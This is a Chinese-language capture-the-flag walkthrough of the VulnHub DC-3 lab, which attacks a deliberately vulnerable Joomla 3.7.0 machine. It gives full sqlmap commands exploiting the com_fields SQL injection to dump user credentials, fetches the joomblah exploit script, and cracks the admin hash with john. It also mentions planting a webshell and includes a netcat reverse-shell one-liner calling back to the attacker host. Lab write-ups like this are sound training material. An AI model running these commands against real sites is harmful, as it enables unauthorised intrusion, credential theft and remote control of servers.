环境搭建
当出现DE 设备 (磁盘/CD-ROM)配置不正确。“ide0:1”上具有一个 IDE 从设备,但没有主设备。此配置在虚拟机中无法正常运行。请使用配置编辑器将磁盘/CD-ROM 从“ide0:1”移到“ide0:0”。错误时,
将IDE改为0:0即可
详情
名称 | DC- 3 |
---|---|
发布日期 | 2020年4月25日 |
作者 | DCAU |
系列 | DC |
网页 | https://www.vulnhub.com/entry/dc-32,312/ |
描述
DC-3是另一个专门构建的易受攻击的实验室,旨在获得渗透测试领域的经验。
与以前的DC版本一样,这个版本在设计时考虑到了初学者,尽管这一次只有一个标志,一个入口点,根本没有线索。
Linux技能和对Linux命令行的熟悉程度是必须的,基本的渗透测试工具的一些经验也是必须的。
对于初学者来说,Google可以提供很大的帮助,但你可以随时在@DCAU7上发推文给我,寻求帮助,让你再次前进。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
对于那些有CTF和Boot2Root挑战经验的人来说,这可能根本不会花费你很长时间(事实上,它可能需要不到20分钟的时间)。
如果是这样的话,如果你希望它成为一个更大的挑战,你可以随时重做挑战,并探索其他获得根和获得旗帜的方法。
使用工具
攻击者:kali 192.168.10.153
靶机:dc-3 192.168.10.161
一:信息收集
0x01 查看存活主机
arp-scan -l 二层主机扫描,主动发送ARP包进行嗅探
0x02查看开放端口
masscan --rate=100000 --ports 0-65535 192.168.10.161
0x03 查看端口服务
nmap -sV -T4 -O -p 80 192.168.10.161
0x04 下载joomscan
apt install joomscan
0x05查看joomscan版本信息
joomscan -u http://192.168.10.161
二:漏洞发现
查看版本漏洞
searchsploit joomla 3.7.0
cat webapps/42033.txt
漏洞利用
方法一:sql注入
提示使用sql注入
sqlmap -u
“http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent --dbs -p list[fullordering]
查库名
1:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
查表名
2:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
查列名
3:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
查找字段信息
4:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "name,password,username" --dump -p list[fullordering]
方法二:使用joomblah脚本
下载 joomblah.py 脚本
wget
https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py
执行joomblah获得密码密文
python2 joomblah.py http://192.168.10.161
破解加密
0x01 保存密文文件
vim adminhash.txt
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
0x02 识别hash类型并破解
john adminhash.txt
john --show adminhash.txt
0x03 写入一句话木马
进入网站,写入一句话木马
0x04 蚁剑直连
0x05 反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.153 443 >/tmp/f
四:提权
0x01 查看版本信息
0x02 查看版本漏洞
0x03 下载漏洞执行压缩包
0x04 解压执行payload
0x05 获取flag
总结
这个靶机考察了使用者对于cms的利用手段,hash密文爆破方式,sqlmap的使用方式,对于漏洞的利用能力